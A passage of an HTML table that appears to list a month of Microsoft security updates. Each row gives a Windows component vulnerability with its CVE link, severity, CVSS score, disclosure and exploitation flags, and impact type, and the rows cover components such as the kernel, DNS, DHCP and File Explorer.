 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50352"><span>CVE-2026-50352</span></a></td>
  <td width="256" class="xl74">Windows Cryptographic
  Services Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="48">
  <td class="xl67" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50302"><span>CVE-2026-50302</span></a></td>
  <td width="256" class="xl74">Windows Cryptographic
  Services Security Feature Bypass Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">4.2</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">SFB</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55144"><span>CVE-2026-55144</span></a></td>
  <td width="256" class="xl74">Windows Cryptography
  API: Next Generation (CNG) Tampering Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Tampering</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50347"><span>CVE-2026-50347</span></a></td>
  <td width="256" class="xl74">Windows Data.dll
  Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49181"><span>CVE-2026-49181</span></a></td>
  <td width="256" class="xl74">Windows DHCP Client
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50683"><span>CVE-2026-50683</span></a></td>
  <td width="256" class="xl74">Windows DHCP Client
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58627"><span>CVE-2026-58627</span></a></td>
  <td width="256" class="xl74">Windows DHCP Server
  Denial of Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50685"><span>CVE-2026-50685</span></a></td>
  <td width="256" class="xl74">Windows DHCP Server
  Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49807"><span>CVE-2026-49807</span></a></td>
  <td width="256" class="xl74">Windows DirectX
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.2</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49175"><span>CVE-2026-49175</span></a></td>
  <td width="256" class="xl74">Windows DNS Client
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50487"><span>CVE-2026-50487</span></a></td>
  <td width="256" class="xl74">Windows DNS Client
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50465"><span>CVE-2026-50465</span></a></td>
  <td width="256" class="xl74">Windows DNS Client
  Tampering Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Tampering</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49169"><span>CVE-2026-49169</span></a></td>
  <td width="256" class="xl74">Windows DNS Server
  Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50426"><span>CVE-2026-50426</span></a></td>
  <td width="256" class="xl74">Windows DNS Server
  Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50424"><span>CVE-2026-50424</span></a></td>
  <td width="256" class="xl74">Windows Domain
  Controller Denial of Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50300"><span>CVE-2026-50300</span></a></td>
  <td width="256" class="xl74">Windows DWM Core
  Library Information Disclosure<span> 
  </span>Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50437"><span>CVE-2026-50437</span></a></td>
  <td width="256" class="xl74">Windows DWM Core
  Library Information Disclosure<span> 
  </span>Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="48">
  <td class="xl67" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-34348"><span>CVE-2026-34348</span></a></td>
  <td width="256" class="xl74">Windows Event Logging
  Service Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50502"><span>CVE-2026-50502</span></a></td>
  <td width="256" class="xl74">Windows Event Logging
  Service Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33842"><span>CVE-2026-33842</span></a></td>
  <td width="256" class="xl74">Windows File Explorer
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40422"><span>CVE-2026-40422</span></a></td>
  <td width="256" class="xl74">Windows File Explorer
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41087"><span>CVE-2026-41087</span></a></td>
  <td width="256" class="xl74">Windows File Explorer
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50473"><span>CVE-2026-50473</span></a></td>
  <td width="256" class="xl74">Windows File Explorer
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50442"><span>CVE-2026-50442</span></a></td>
  <td width="256" class="xl74">Windows File Explorer
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50389"><span>CVE-2026-50389</span></a></td>
  <td width="256" class="xl74">Windows File Explorer
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50456"><span>CVE-2026-50456</span></a></td>
  <td width="256" class="xl74">Windows File Explorer
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57084"><span>CVE-2026-57084</span></a></td>
  <td width="256" class="xl74">Windows File Explorer
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57091"><span>CVE-2026-57091</span></a></td>
  <td width="256" class="xl74">Windows File History
  Service Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50405"><span>CVE-2026-50405</span></a></td>
  <td width="256" class="xl74">Windows Filtering
  Platform Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49172"><span>CVE-2026-49172</span></a></td>
  <td width="256" class="xl74">Windows FTP Service
  Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">9.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50387"><span>CVE-2026-50387</span></a></td>
  <td width="256" class="xl74">Windows GDI Elevation
  of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54122"><span>CVE-2026-54122</span></a></td>
  <td width="256" class="xl74">Windows GDI+ Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.4</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50483"><span>CVE-2026-50483</span></a></td>
  <td width="256" class="xl74">Windows Graphics
  Component Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="73">
  <td class="xl67" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58609"><span>CVE-2026-58609</span></a></td>
  <td width="256" class="xl74">Windows Graphics
  Component Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50391"><span>CVE-2026-50391</span></a></td>
  <td width="256" class="xl74">Windows Group Policy
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50310"><span>CVE-2026-50310</span></a></td>
  <td width="256" class="xl74">Windows Human
  Interface Device Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">4.7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50485"><span>CVE-2026-50485</span></a></td>
  <td width="256" class="xl74">Windows Hyper-V Denial
  of Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">4.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54129"><span>CVE-2026-54129</span></a></td>
  <td width="256" class="xl74">Windows Hyper-V
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50315"><span>CVE-2026-50315</span></a></td>
  <td width="256" class="xl74">Windows Image
  Acquisition Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58534"><span>CVE-2026-58534</span></a></td>
  <td width="256" class="xl74">Windows Input Method
  Editor (IME) Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50490"><span>CVE-2026-50490</span></a></td>
  <td width="256" class="xl74">Windows Installer
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58540"><span>CVE-2026-58540</span></a></td>
  <td width="256" class="xl74">Windows Installer
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50425"><span>CVE-2026-50425</span></a></td>
  <td width="256" class="xl74">Windows Internal
  System User Profile Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50293"><span>CVE-2026-50293</span></a></td>
  <td width="256" class="xl74">Windows Internal Task
  Bar Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49167"><span>CVE-2026-49167</span></a></td>
  <td width="256" class="xl74">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">4.7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49173"><span>CVE-2026-49173</span></a></td>
  <td width="256" class="xl74">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54132"><span>CVE-2026-54132</span></a></td>
  <td width="256" class="xl74">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49795"><span>CVE-2026-49795</span></a></td>
  <td width="256" class="xl74">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49798"><span>CVE-2026-49798</span></a></td>
  <td width="256" class="xl74">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">9.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49808"><span>CVE-2026-49808</span></a></td>
  <td width="256" class="xl74">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50354"><span>CVE-2026-50354</span></a></td>
  <td width="256" class="xl74">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50332"><span>CVE-2026-50332</span></a></td>
  <td width="256" class="xl74">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50377"><span>CVE-2026-50377</span></a></td>
  <td width="256" class="xl74">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50390"><span>CVE-2026-50390</span></a></td>
  <td width="256" class="xl74">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50423"><span>CVE-2026-50423</span></a></td>
  <td width="256" class="xl74">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50397"><span>CVE-2026-50397</span></a></td>
  <td width="256" class="xl74">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50436"><span>CVE-2026-50436</span></a></td>
  <td width="256" class="xl74">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50399"><span>CVE-2026-50399</span></a></td>
  <td width="256" class="xl74">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50459"><span>CVE-2026-50459</span></a></td>
  <td width="256" class="xl74">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50477"><span>CVE-2026-50477</span></a></td>
  <td width="256" class="xl74">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50478"><span>CVE-2026-50478</span></a></td>
  <td width="256" class="xl74">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50484"><span>CVE-2026-50484</span></a></td>
  <td width="256" class="xl74">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50673"><span>CVE-2026-50673</span></a></td>
  <td width="256" class="xl74">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58532"><span>CVE-2026-58532</span></a></td>
  <td width="256" class="xl74">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50294"><span>CVE-2026-50294</span></a></td>
  <td width="256" class="xl74">Windows Kernel
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.2</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50316"><span>CVE-2026-50316</span></a></td>
  <td width="256" class="xl74">Windows Kernel
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50419"><span>CVE-2026-50419</span></a></td>
  <td width="256" class="xl74">Windows Kernel
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">3.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50463"><span>CVE-2026-50463</span></a></td>
  <td width="256" class="xl74">Windows Kernel
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50475"><span>CVE-2026-50475</span></a></td>
  <td width="256" class="xl74">Windows Kernel
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50429"><span>CVE-2026-50429</span></a></td>
  <td width="256" class="xl74">Windows Kernel
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.2</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58614"><span>CVE-2026-58614</span></a></td>
  <td width="256" class="xl74">Windows Kernel
  Security Feature Bypass Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58545"><span>CVE-2026-58545</span></a></td>
  <td width="256" class="xl74">Windows Kernel
  Security Feature Bypass Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58602"><span>CVE-2026-58602</span></a></td>
  <td width="256" class="xl74">Windows Kernel-Mode
  Driver Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50393"><span>CVE-2026-50393</span></a></td>
  <td width="256" class="xl74">Windows Kernel-Mode
  Driver Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
